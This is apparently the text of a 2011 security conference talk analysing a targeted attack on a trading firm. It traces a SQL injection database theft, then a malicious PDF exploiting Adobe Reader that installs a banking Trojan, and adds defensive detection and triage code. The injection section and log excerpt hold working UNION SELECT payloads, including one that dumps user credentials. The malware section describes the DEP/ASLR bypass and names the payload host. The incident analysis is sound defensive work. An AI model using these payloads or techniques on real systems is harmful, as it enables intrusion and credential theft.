
Hashdays 2011 Cybercrime in nowadays businesses: A real case study of targeted attack

Frédéric BOURLA, Head of Ethical Hacking Department
ORIGINAL SWISS ETHICAL HACKING
2011 High-Tech Bridge SA www.htbridge.ch

0x00 - #whoami

Frédéric BOURLA, Head of Ethical Hacking Department, High-Tech Bridge SA
~12 years experience in Information Security
LPT, CISSP, CCSE, CCSA, ECSA, CEH, eCPPT
CHFI, GCFA & GREM in progress
RHCE, RHCT, MCP
frederic.bourla@htbridge.ch

0x01 - #readelf prez

Cyber attacks have evolved:
- They became more sophisticated
- They are often targeted
- It is not uncommon anymore to observe attacks managed by specialized groups and initiated by unfair competitors

This talk is an example of such threats. It is based on a post-incident investigation which took place in October 2010. To preserve the client's anonymity, let's call him Fedor-Trading. 1 round of 50. To save time, please keep your questions until the end.

Table of contents

0x00 - About me
0x01 - About this conference
0x02 - Projects context
0x03 - Mail analysis
0x04 - Clients Website analysis
0x05 - Malware analysis
0x06 - Conclusion

0x02 - Projects context

Last year, the CTO of a well known financial institution contacted us.

Fedor-Trading thought about a kind of Phishing attempt, and the CTO expected us to help him reassure the CEO that everything was fine and that no real attack had occurred. The initial project was a quick investigation driven by political reasons, and it began with an analysis of the emails they received in one of their administrative mailboxes.


0x02 - Mail analysis

They received several emails which appeared to have been sent from Fedor-Trading:

0x02 - Mail analysis

At a first glance, all suspicious emails received didn't look like Phishing:
- There are no multiple spelling mistakes per line
- The content itself sounds sophisticated
- All emails dealt with real matters and enticed Forex users to open a PDF

Instead, all those emails sounded like targeted attacks.

0x02 - Mail analysis

SMTP headers reveal the sending domain:

0x02 - Mail analysis

The FQDN matches IP address 67.227.134.84. The hosting server is located in the US.

0x02 - Mail analysis

The parent domain neonrain-vps.com belongs to Neon Rain Interactive since 26 March 2008.

0x02 - Mail analysis

The remote system hosted an out-of-date Apache engine and is weakly configured:
- Talkative banners
- Some indexed directories
- Lots of Information Disclosure
- Publicly available cPanel interface
- Some outdated components

0x02 - Mail analysis

A reverse DNS lookup showed that the IP address 67.227.134.84 was used to host multiple websites. At least 82 domains were hosted on the same server. The combination of these factors gave us a strong likelihood that the malicious emails were sent from a compromised Web server, thus concealing the identity of the attackers.

0x02 - Mail analysis

The domain host.neonrain-vps.com had an MX record for this host. This configuration permitted to bypass most antispam protections, and all Fedor-Trading's clients who did not rely on a deeper SMTP analysis have probably received those suspicious emails. A quick analysis of the received emails consequently led us to think about a targeted attack, and not a blind one. We definitely needed to get more information and asked for FTP access to Fedor-Trading's website.
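The header check applied above, as an added example that is not part of the original talk: it takes the earliest Received: hop and the Message-ID domain and compares both with the From: domain. The message is constructed; the sender domain fedor-trading.example is a placeholder for the anonymised client, the relay host and IP are the ones named above.

```python
import email
import re
from email import policy

# Constructed sample (not one of the original emails).
SAMPLE_EML = b"""\
Received: from mail.receiver.example (mail.receiver.example [192.0.2.10])
\tby mx.client.example with ESMTP id ABC123; Mon, 4 Oct 2010 10:15:02 +0200
Received: from host.neonrain-vps.com (host.neonrain-vps.com [67.227.134.84])
\tby mail.receiver.example with ESMTP id XYZ789; Mon, 4 Oct 2010 10:14:58 +0200
From: Fedor-Trading Compliance <compliance@fedor-trading.example>
To: customer@victim.example
Subject: Forex regulation update
Message-ID: <20101004081458.1234@host.neonrain-vps.com>

Please read the attached PDF.
"""

# "from <helo> (<rdns> [<ip>])" as written by most MTAs; rdns is optional.
RECEIVED_FROM = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[\]]+)?\s*\[(?P<ip>[0-9.]+)\]")


def originating_hop(msg):
    """(helo, rdns, ip) of the earliest Received: header, i.e. the relay that
    injected the message into the mail path. Headers are prepended, so it is last."""
    received = msg.get_all("Received") or []
    if not received:
        return None
    m = RECEIVED_FROM.search(" ".join(str(received[-1]).split()))
    return (m.group("helo"), m.group("rdns") or "", m.group("ip")) if m else None


def registrable(host):
    """Crude parent-domain extraction: last two labels (enough for .com/.ch style names)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def header_findings(raw):
    """List of inconsistencies between the claimed sender and the observed path."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_addr = msg["From"].addresses[0].addr_spec
    from_domain = registrable(from_addr.split("@", 1)[1])
    findings = []
    hop = originating_hop(msg)
    if hop:
        helo, rdns, ip = hop
        if registrable(helo) != from_domain:
            findings.append(f"first hop {helo} [{ip}] is not in sender domain {from_domain}")
        if rdns and registrable(rdns) != registrable(helo):
            findings.append(f"HELO {helo} disagrees with reverse DNS {rdns}")
    msgid = str(msg.get("Message-ID", ""))
    msgid_domain = msgid.rsplit("@", 1)[-1].rstrip(">") if "@" in msgid else ""
    if msgid_domain and registrable(msgid_domain) != from_domain:
        findings.append(f"Message-ID domain {msgid_domain} is not the sender domain")
    return findings
```

A mismatch between the injecting relay and the sender domain is exactly what an MX record on the relay does not fix: it only satisfies a superficial "does the host accept mail" check.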


0x04 - Clients Website analysis

The frontal website was hosted externally, on Infomaniak Network. The first thing we noticed is that the website hosted a talkative robots.txt file:

0x04 - Clients Website analysis

The passwd file revealed several forgotten accounts, but no trace of a potential compromise.

The website contained a huge amount of logs. We downloaded them to carry out local inspection.

0x04 - Clients Website analysis

Fedor-Trading's website was often under automated attacks.

0x04 - Clients Website analysis

In parallel with attack-pattern queries in those huge logs (quite slow, as there was no timeframe for this hypothetical attack), we looked furtively at the website's security level. Although a kind of Web Application Firewall successfully prevented our first attacks, the website sounded vulnerable to SQLi.

0x04 - Clients Website analysis

We parsed the logs for usual SQL injection signatures, and lots of occurrences were also identified.

0x04 - Clients Website analysis

Quite evolved injections were attempted.

The first identified attacks were unsuccessful and only relied on automated exploitation tools. For example, the banner and the hexadecimal constant used while trying to determine the number of fields in the SQL query indicated the Havij tool.

0x04 - Clients Website analysis

The next step therefore consisted in simulating such automated attacks to assess the level of information which could have been collected by hackers. Indeed, we used the current 1.12 version of Havij against Fedor-Trading. This tool has been proven inefficient in this specific case.

0x04 - Clients Website analysis

Nevertheless it permitted to confirm the SQLi attack vector, as the name of the database was successfully dumped.

0x04 - Clients Website analysis

In order to efficiently identify successful SQLi exploitation in the huge web server logs, we asked the client for temporary credentials on their Infomaniak web administration page. This offered us the best view of operational structures, and therefore permitted to fine-tune our queries with keywords which had a high probability of occurrence in case of successful SQLi exploitation.

0x04 - Clients Website analysis

This was much faster. New attacks were quickly identified. More pernicious, those attacks clearly showed that Fedor-Trading's website was compromised, and that nearly the whole backend database had been stolen.

0x04 - Clients Website analysis

Indeed, most tables were remotely dumped by hackers, and the email addresses of our client's customers were stolen.

The source IP address 89.165.79.237 was located in Iran and didn't host any publicly available service. It was most probably a bot intended to hide the attackers' identity.

0x04 - Clients Website analysis

The impacted web application consisted of self-made code as well as the Joomla open source CMS and several commercial plugins.

The exploited vulnerability resided in a Joomla commercial plugin named Sh404Sef. This security module provides SEO, analytics and URL Rewriting. It is also supposed to prevent XSS, flooding and other malicious page requests. But unfortunately it allowed hackers to inject SQL code. In that particular case, the security module brought insecurity.

0x04 - Clients Website analysis

The SQLi vulnerability was a little bit tricky, and none of the leading automated tools was able to exploit it. Most of them didn't even detect any security problem on Fedor-Trading's website. The fact is that only a slow and manual attack could have permitted its exploitation.

0x04 - Clients Website analysis

As a PoC, we demonstrated that the following parameters in GET requests permitted to remotely dump all sensitive information from the backend database:

0x04 - Clients Website analysis

In this attack, the information leakage occurred in the title bar of the Internet browser window.

The 1st request simply permits to identify the PHP engine version.

0x04 - Clients Website analysis

Requests 2 and 3 permit to get the username and the database name.

0x04 - Clients Website analysis

Requests 4 to 6 permit to list databases.

0x04 - Clients Website analysis

GSDB only hosts 3 databases, as there is no result for the 7th GET request:

?id=3-9999+union+SELECT%20schema_name%20FROM%20information_schema.schemata%20limit%203,1--

0x04 - Clients Website analysis

Requests 8 and 9 permit to get schema and tables.

0x04 - Clients Website analysis

The 10th request permits to enumerate tables from the main database.

Request 11 enumerates columns from the jos_users table.

0x04 - Clients Website analysis

And finally the 12th request permits to collect names, emails and password hashes from the jos_users table.

With a small automation script, it was possible to remotely dump all sensitive tables, such as personal data related to Forex accounts from the TAibs_c table and the trading platform administrators' password hash from the USERS table.
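The log search described in this section (fine-tuned keywords rather than generic SQLi signatures), as an added example that is not the original investigation's script: it URL-decodes each request, decodes hex literals such as 0x6a6f735f7573657273 (which hide table names from a plain grep), and tracks per source address how far the enumeration chain walked through above went. The log excerpt is constructed in Apache combined format; the source address is the one named on the slides, the request shapes follow the twelve requests, everything else is made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed log excerpt (not the client's real logs).
LOG_LINES = """\
203.0.113.7 - - [02/Oct/2010:09:12:01 +0200] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
89.165.79.237 - - [02/Oct/2010:23:41:07 +0200] "GET /index.php?id=3-9999+union+SELECT%20@@version-- HTTP/1.1" 200 4311 "-" "Mozilla/4.0"
89.165.79.237 - - [02/Oct/2010:23:41:19 +0200] "GET /index.php?id=3-9999+union+SELECT%20user()-- HTTP/1.1" 200 4298 "-" "Mozilla/4.0"
89.165.79.237 - - [02/Oct/2010:23:41:31 +0200] "GET /index.php?id=3-9999+union+SELECT%20database()-- HTTP/1.1" 200 4301 "-" "Mozilla/4.0"
89.165.79.237 - - [02/Oct/2010:23:42:02 +0200] "GET /index.php?id=3-9999+union+SELECT%20schema_name%20FROM%20information_schema.schemata%20limit%203,1-- HTTP/1.1" 200 4290 "-" "Mozilla/4.0"
89.165.79.237 - - [02/Oct/2010:23:43:10 +0200] "GET /index.php?id=3-9999+union+SELECT%20table_name%20FROM%20information_schema.tables%20limit%201,1-- HTTP/1.1" 200 4322 "-" "Mozilla/4.0"
89.165.79.237 - - [02/Oct/2010:23:44:05 +0200] "GET /index.php?id=3-9999+union+SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name=0x6a6f735f7573657273-- HTTP/1.1" 200 4330 "-" "Mozilla/4.0"
89.165.79.237 - - [02/Oct/2010:23:45:40 +0200] "GET /index.php?id=3-9999+union+SELECT%20concat(username,0x3a,email,0x3a,password)%20FROM%20jos_users-- HTTP/1.1" 200 4410 "-" "Mozilla/4.0"
198.51.100.9 - - [03/Oct/2010:01:02:03 +0200] "GET /index.php?id=3'+and+1=1-- HTTP/1.1" 403 512 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
UNION = re.compile(r"\bunion\b.{0,20}\bselect\b", re.I | re.S)
HEXLIT = re.compile(r"0x([0-9a-f]{2,})", re.I)

# Each stage is one step of the enumeration chain seen in the case; the table
# names are the ones the slides mention.
STAGES = [
    ("tautology",   re.compile(r"\b(?:and|or)\s+\d+=\d+", re.I)),
    ("fingerprint", re.compile(r"version\(\)|@@version|\buser\(\)|database\(\)", re.I)),
    ("schemata",    re.compile(r"information_schema\.schemata", re.I)),
    ("tables",      re.compile(r"information_schema\.tables", re.I)),
    ("columns",     re.compile(r"information_schema\.columns", re.I)),
    ("dump",        re.compile(r"\bfrom\s+(?:jos_users|users|taibs_c)\b", re.I)),
]
ENUMERATION = {"schemata", "tables", "columns", "dump"}


def decode_hex_literals(text):
    """Replace MySQL 0x.. literals by their ASCII value when it is printable."""
    def repl(m):
        try:
            s = bytes.fromhex(m.group(1)).decode("ascii")
        except ValueError:          # odd length or non-ASCII: keep the literal
            return m.group(0)
        return s if s.isprintable() else m.group(0)
    return HEXLIT.sub(repl, text)


def classify(log):
    """Per source IP: stages reached, and how many injection requests were served (2xx)
    versus blocked (anything else, e.g. the WAF's 403)."""
    report = {}
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_hex_literals(unquote_plus(m.group("path")))
        stages = {name for name, rx in STAGES if rx.search(query)}
        if UNION.search(query):
            stages.add("union")
        if not stages:
            continue
        entry = report.setdefault(m.group("ip"), {"stages": set(), "served": 0, "blocked": 0})
        entry["stages"] |= stages
        entry["served" if m.group("status").startswith("2") else "blocked"] += 1
    return report


def likely_exfiltration(report):
    """Sources that walked the whole schemata -> tables -> columns -> dump chain and
    got 2xx answers: the pattern that separates a successful manual attack from
    the background noise of automated scanners."""
    return sorted(ip for ip, e in report.items()
                  if ENUMERATION <= e["stages"] and e["served"] > 0)
```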

0x04 - Clients Website analysis

After version 1.5, Joomla relied on a random salt in its password hashing function. This approach permits to efficiently disturb Time-Memory Trade-Off attacks:

$hash=md5($pass.$salt)

Since then, Rainbow Tables attacks against accounts gathered from compromised Joomla websites remain inefficient.

Nevertheless, one of the administrators' accounts had no salt. The password was therefore stored as a weak MD5 hash. It was most probably an old account created with a previous version of the web application, which remained unchanged since the migration. The vulnerable account belonged to an external consultant.

Anonymised:Anonymised:anonymised@anonymised.com:c2e285cb33cecdbeb83d2189e983a8c0

0x04 - Clients Website analysis

It was possible to break it in a few seconds.

Hackers never logged in with this account. Fortunately, a noisy defacing would have been out of scope and totally counterproductive.

0x04 - Clients Website analysis

Internal admin accounts were salted and strong enough to resist most dictionary attacks.
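The point made on the last few slides (salted md5($pass.$salt) defeats precomputed tables, a leftover unsalted account does not), as an added example that is not Joomla's code: the stored format "digest:salt" is Joomla's, the salt generator and the word list are this example's own, and the audit function lists the accounts that still carry the legacy unsalted format so that they can be reset.

```python
import hashlib
import secrets
import string

SALT_ALPHABET = string.ascii_letters + string.digits


def joomla_hash(password, salt=None):
    """Stored form used by Joomla from 1.5 on: md5(password + salt) + ':' + salt.
    The 32-character salt generator here is this example's own (assumption);
    only the stored format matters for the comparison below."""
    if salt is None:
        salt = "".join(secrets.choice(SALT_ALPHABET) for _ in range(32))
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest() + ":" + salt


def joomla_verify(password, stored):
    """Recompute md5(password + salt) and compare in constant time."""
    digest, _, salt = stored.partition(":")
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return secrets.compare_digest(candidate, digest)


def build_lookup_table(words):
    """Precomputed md5 -> word map: the cheap stand-in for a rainbow table,
    built once and reused against every dump."""
    return {hashlib.md5(w.encode("utf-8")).hexdigest(): w for w in words}


def lookup_unsalted(stored, table):
    """A precomputed table answers only for legacy unsalted entries; a salted
    entry would need the whole table rebuilt for that single salt."""
    digest, _, salt = stored.partition(":")
    return None if salt else table.get(digest)


def legacy_accounts(rows):
    """rows: iterable of (username, stored_hash) as found in jos_users.
    Returns the accounts still on the pre-1.5 unsalted format, i.e. the ones a
    migration should have forced to reset."""
    return [user for user, stored in rows
            if ":" not in stored or not stored.partition(":")[2]]


# Constructed word list and sample rows; nothing here is the real account data.
WORDLIST = ["password", "letmein", "forex2010", "trading", "Consult4nt"]
```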


0x05 - Malware analysis

After having stolen the MySQL databases through an SQL Injection on the trading platform, the hackers moved to a Social Engineering phase which targeted Forex users. Most of them received a credible fake email which enticed them into opening an embedded PDF file. Therefore, the last part of the attack which required a deep analysis dealt with the PDF files attached to the fake emails. Several emails were sent, but all of them included a renamed version of the same PDF.

0x05 - Malware analysis

PDF is one of the most prevalent methods for remote exploitation:
- Victims can easily be sent targeted, socially engineered emails with such attachments
- PDF links are common on websites and may permit drive-by exploitation
- This file format is widely spread among companies and most often authorized by perimeter protections
- It is still quite hard for antivirus to detect malicious content

0x05 - Malware analysis

On the 9th October 2010, only 4 antivirus out of 43 detected a threat in this PDF, which is a 9.3% detection rate: AntiVir, Emsisoft, Ikarus, Microsoft.

One year later, on the 13th October 2011, only 16 antivirus out of 43 efficiently detect a threat. This is still a low detection rate of 37.2%.

0x05 - Malware analysis

Indeed, PDF supports different compression formats which help hiding code: FlateDecode, ASCIIHexDecode, LZWDecode, ASCII85Decode, RunLengthDecode.

It also supports encryption: 40+128 bits RC4, 128 bits AES.

0x05 - Malware analysis

And the PDF format also natively supports Unicode, Hex as well as fromCharCode. All of them are widely used for obfuscation purposes. Internal logical streams can embed other objects which support further client side scripting, such as Flash ActionScript. It offers an efficient way to carry out Heap Spraying and Egg Hunting.

For all those reasons, PDF is an attack vector of choice for hackers.

0x05 - Malware analysis

In our case, the maliciously crafted PDF file exploited a critical vulnerability which affected all Adobe Reader applications prior to version 9.4 on multiple OS (CVE-2010-2883). Opening this file within Adobe Reader v9.3.4 or any older version could alter its execution flow and run arbitrary code. This vulnerability was actively exploited on the Internet when the attack occurred. Since Adobe Reader v9.4 was publicly available on 5th October 2010, this attack implied a 0-day with a high rate of successful compromise.

0x05 - Malware analysis

A quick search for risky keywords with PDFID revealed client-side code.

Quite unusual in malicious PDF
Action automatically executed on form load

0x05 - Malware analysis

The proportion of randomness in the file can also tell us more about this PDF.

The total entropy and the entropy of bytes inside stream objects are close to the maximum of 8, which suggests a normal PDF document.

0x05 - Malware analysis

Nevertheless, the entropy outside stream objects is also quite high. In a normal PDF, it is usually between 4 and 5. This may lead us to think about a malformed PDF document, where data is added without stream objects.

We can also notice that there is only one %%EOF in the document, despite there being lots of bytes after the last %%EOF, which also suggests that data has been added.
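The static triage run on the last three slides (risky keywords, entropy inside versus outside streams, %%EOF count and trailing bytes), written out as an added example; it is not PDFID or any other existing tool. The sample document is constructed: a minimal PDF with an OpenAction that runs a harmless JavaScript alert, followed by appended non-PDF bytes to reproduce the "data after the last %%EOF" symptom.

```python
import math
import re

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
KEYWORDS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/AcroForm",
            b"/Launch", b"/EmbeddedFile"]


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def split_streams(pdf):
    """Bytes inside stream...endstream pairs versus everything else."""
    inside = b"".join(m.group(1) for m in STREAM_RE.finditer(pdf))
    return inside, STREAM_RE.sub(b"", pdf)


def triage(pdf):
    inside, outside = split_streams(pdf)
    last = pdf.rfind(b"%%EOF")
    trailing = len(pdf) - (last + len(b"%%EOF")) if last != -1 else len(pdf)
    # A keyword must not be followed by a letter, so /JS does not also count /JSx.
    keywords = {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", pdf))
                for k in KEYWORDS}
    return {
        "keywords": keywords,
        "entropy_total": round(shannon_entropy(pdf), 2),
        "entropy_inside": round(shannon_entropy(inside), 2),
        "entropy_outside": round(shannon_entropy(outside), 2),
        "eof_count": pdf.count(b"%%EOF"),
        "bytes_after_last_eof": trailing,
    }


def suspicious(report):
    """Turn the measurements into the observations made on the slides."""
    k = report["keywords"]
    reasons = []
    if k["/JavaScript"] or k["/JS"]:
        reasons.append("embedded JavaScript")
    if k["/OpenAction"] or k["/AA"]:
        reasons.append("action executed automatically on open")
    if report["entropy_outside"] > 5.0:   # clean documents usually sit between 4 and 5 here
        reasons.append("high entropy outside streams: data added without stream objects?")
    if report["bytes_after_last_eof"] > 64:
        reasons.append("payload-sized data after the last %%EOF")
    return reasons


# Constructed samples: a harmless alert, and a bare document with nothing appended.
JS_BODY = b"app.alert('constructed sample, no exploit here');"
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R /AcroForm 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [4 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS 7 0 R >> endobj\n"
    b"4 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"5 0 obj << /Fields [] >> endobj\n"
    b"7 0 obj << /Length " + str(len(JS_BODY)).encode() + b" >>\nstream\n"
    + JS_BODY + b"\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
) + bytes(range(256)) * 4          # appended junk after the only %%EOF
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
```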

0x05 - Malware analysis

So a good idea should be to dig a little bit further through Origami. Unfortunately the Walker GUI was tricked into errors.

0x05 - Malware analysis

Command line extraction also got problems, but at least confirmed some results.

0x05 - Malware analysis

In fact, even Adobe thought it was damaged. Unfortunately it managed to read it.

0x05 - Malware analysis

The logical flaw remained easy to identify.

0x05 - Malware analysis

Nevertheless, we were still not able to extract the embedded JavaScript code.

0x05 - Malware analysis

Object 3 contains the string /JavaScript and was configured to execute code from object 7. Object 30 also contained the string /JS and holds code.

0x05 - Malware analysis

Nevertheless, the payload was quite heavily obfuscated.

0x05 - Malware analysis

Most crafted PDFs rely on a simple XOR with a single byte long key, or use ROL/ROR operations for obfuscation purposes. But not there. As a consequence, tools like XorSearch didn't get any result.

The only solution seemed to be the reverse engineering approach.

0x05 - Malware analysis

Indeed, the interesting content was encrypted with a 4 bytes XOR operation.

0x05 - Malware analysis

After the identification of the 4 bytes key 0x4114D345, we were able to extract the mea.dll file embedded in the malicious PDF. This one was not encrypted, and revealed the final URL which hosted the ultimate payload, as confirmed by the following analysis.
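The 4-byte XOR layer and its key recovery, as an added example that is not the reverse-engineering session from the talk: a known-plaintext search (the "MZ" header of the embedded DLL, then the DOS stub sentence as confirmation) yields the key at every candidate offset, and the decoded payload is searched for cleartext URLs. The embedded file is a constructed fake PE, not mea.dll; the key is the one stated on the slide, taken as the bytes 41 14 D3 45 in the printed order (assumption, the byte order is not stated).

```python
import re

# Key identified in the case, taken in the order printed (assumption).
CASE_KEY = bytes.fromhex("4114D345")
# First four bytes of a typical linker-produced PE (assumption about the sample).
KNOWN_DOS_HEADER = b"MZ\x90\x00"
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def xor4(data, key, offset=0):
    """XOR data with a repeating 4-byte key. offset is the key phase of data[0],
    useful when data is a slice taken from the middle of an encrypted region."""
    return bytes(b ^ key[(i + offset) % 4] for i, b in enumerate(data))


def recover_key(blob, known=KNOWN_DOS_HEADER, window=256):
    """Known-plaintext recovery: at every offset, the 4 cipher bytes XOR the expected
    header give one candidate key; it is accepted only if the decrypted window also
    contains the DOS stub sentence. Returns (offset, key) or None."""
    for pos in range(len(blob) - len(known) + 1):
        key = bytes(blob[pos + i] ^ known[i] for i in range(4))
        if DOS_STUB_TEXT in xor4(blob[pos:pos + window], key):
            return pos, key
    return None


def extract_embedded_pe(blob):
    """Locate and decrypt the XOR-ed PE carried inside an arbitrary container."""
    hit = recover_key(blob)
    if hit is None:
        return None
    pos, key = hit
    return key, xor4(blob[pos:], key)


def find_urls(data):
    """Cleartext URLs in the decoded payload, the lead the analysis followed next."""
    return [u.decode("ascii") for u in URL_RE.findall(data)]


# Constructed stand-in for the embedded DLL: a fake PE header (not loadable), the DOS
# stub sentence and a download URL on a reserved domain. Nothing here is the real mea.dll.
FAKE_PE = (KNOWN_DOS_HEADER + b"\x03\x00\x00\x00" + b"\x00" * 56 + b"\x80\x00\x00\x00"
           + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
           + DOS_STUB_TEXT + b".\r\r\n$" + b"\x00" * 13
           + b"PE\x00\x00" + b"\x00" * 40
           + b"http://www.example.invalid/update2.exe\x00")
# The container: 18 bytes of unrelated data, then the PE XOR-ed with CASE_KEY.
SAMPLE_BLOB = b"%PDF-1.4 obj junk\n" + xor4(FAKE_PE, CASE_KEY)
```

On a real sample the blob is the raw bytes of the suspicious object; a single-byte XOR or ROL/ROR layer, which XorSearch handles, would be found the same way with a 1-byte candidate.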

0x05 - Malware analysis

Opening CoolType.dll from Adobe Reader in IDA revealed the abused strcat. The uniqueName field from the SING table structure was being used in that function.

0x05 - Malware analysis

The exploit relied on /AcroForm JavaScript to detect the version of Adobe Reader and switch to the appropriate payload. Then a heap spray was used to put the ROP data into memory at a guessable address. This heap spray followed a huge RET sled, which acted as a more classical NOP string while transitioning between the stack Buffer Overflow and the ROP payload. The gadgets used in the ROP payload come from the icucnv36.dll module, which was not compiled with ASLR, as discussed soon.

0x05 - Malware analysis

Attackers used ROP techniques. Instead of redirecting the execution flow to the heap, it jumps to a Code section in a DLL which indeed has the Execute rights. This is achieved by overwriting the Saved EIP on the stack, and by chaining calls into this DLL at specific places through a RET sled crafted on the stack.

0x05 - Malware analysis

The exploit created an empty iso88591 file and mapped it to memory in order to get an executable space, where shellcode could be copied and executed.

0x05 - Malware analysis

The AcroRd32.exe process was also abused to load the icucnv34.dll module, a DLL which was not compiled with ASLR and is therefore always loaded at the same address in memory. It is then possible to use its own IAT to get the addresses of the ASLRed Kernel32 APIs.

0x05 - Malware analysis

As a consequence, both DEP & ASLR were bypassed! Finally, the exploit also worked on Vista and 7, as it didn't use hardcoded XP syscalls. So basically it was already the end of the game.
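The defender's side of the last few slides is a hardening audit: a module that was not linked with ASLR (and DEP) opt-in is loaded at a fixed address and is the kind of module the exploit leaned on. This added example, not part of the talk, reads the DllCharacteristics field of a PE optional header (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040, NX_COMPAT 0x0100) and lists the modules of a process that lack the ASLR bit. The images are constructed header stubs, not the real Adobe Reader DLLs.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in


def pe_mitigations(image):
    """Read DllCharacteristics from a PE image and report the ASLR/DEP opt-in bits."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                       # skip Signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):              # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 of the optional header in both formats.
    dllchar = struct.unpack_from("<H", image, opt + 70)[0]
    return {
        "aslr": bool(dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "dllcharacteristics": dllchar,
    }


def build_stub_image(dllchar, magic=0x10B):
    """Constructed minimal PE header (not a loadable file) with the given flags."""
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)       # e_lfanew
    hdr[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<H", hdr, 0x80 + 4 + 20, magic)
    struct.pack_into("<H", hdr, 0x80 + 4 + 20 + 70, dllchar)
    return bytes(hdr)


def modules_without_aslr(named_images):
    """{module name: image bytes} -> names loaded at a predictable address,
    the finding a hardening review of a process should raise."""
    return sorted(name for name, img in named_images.items()
                  if not pe_mitigations(img)["aslr"])
```

On a live system the same check is run over every module in the Reader process; the module names below are constructed.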

0x05 - Malware analysis

The malware also used some tricks to prevent its analysis. For example, each time we used a Memory BP, we arrived in a long loop which always ended with an exception.

After having dropped another binary from itself, mea.dll overwrites part of its own Text section to prevent memory dumps. The malware also skipped part of its code while running within Immunity Debugger. For example, the adobe1.exe file was not dropped, even if the hidedebug plugin was used.

0x05 - Malware analysis

Another trick was to parse process names. When Process Monitor was running, we didn't see anything. By just renaming the tool, we had far more results and showed the creation of a new binary. File access monitoring confirmed the creation of the new adobe1.exe binary.

This new binary was an unencrypted dropper.

0x05 - Malware analysis

This was also confirmed through a behaviour analysis. Here we simply used a rogue DNS service to redirect traffic to an analysis server.

0x05 - Malware analysis

This process downloaded the update2.exe binary from www.bringithomedude.com.

0x05 - Malware analysis

And here we are! The final aim of the hackers was to silently get and execute a banking Trojan derived from SpyEye's code.

So let's summarize what happened here.


0x05 - Malware analysis

The file adobe1.exe is a simple loader of 2560 bytes. It was not encrypted. On the other hand, the final update2.exe malware was a C# based binary of 668 Kb which included several protections aimed at preventing its reverse engineering. Disassembly revealed BASE64 encoding for raw data as well as encryption algorithms based on MD5 (System.Security.Cryptography.MD5CryptoServiceProvider), 3DES (System.Security.Cryptography.TripleDESCryptoServiceProvider) and AES (System.Security.Cryptography.RijndaelManaged).

0x05 - Malware analysis

When this attack occurred, those files were undetected by most antivirus.

A few European antivirus detected a potential threat, but all Eastern solutions such as Kaspersky, NOD32, DrWeb32 or VBA32 didn't detect anything. It is therefore possible that the Russian market was the initial target of our malware writers.

0x05 - Malware analysis

On the 8th October 2010, 16 antivirus out of 43 detected a potential threat in the final binary. The detection rate was about 37%. On the 15th October 2010, 19 antivirus out of 43 were efficient. The detection rate is about 44%.

Around 8 months later, on the 2nd June 2011, 34 antivirus out of 43 detected a potential threat. This is a detection rate of 79%. Kaspersky, McAfee, Sophos and Microsoft were the most reactive.

0x05 - Malware analysis

Gdata, Panda and Sophos were the next ones. ClamAV, eSafe, F-Secure, Fortinet & PrevX have proven far less effective. The final payload behaved like Zbot. It was based on a mutation of SpyEye. It is a Trojan aimed at the financial sector and it is able to disable the Windows Firewall and steal financial data, such as credit card numbers, eBanking information or trading credentials. Common Trojan features were also available, such as screen capture, additional malware download or remote administration capabilities.

0x05 - Malware analysis

Upon execution, the Trojan creates a folder named svhostxxup.exe in the c:\ drive. Then it creates the files config.bin and svhostxxup.exe in that folder. The latter binary is then called. It is responsible for creating new memory pages in several system applications' address space, and therefore permits attackers to inject their malicious code into privileged programs.

0x05 - Malware analysis

The Trojan then modifies a few registry keys and becomes persistent.

0x05 - Malware analysis

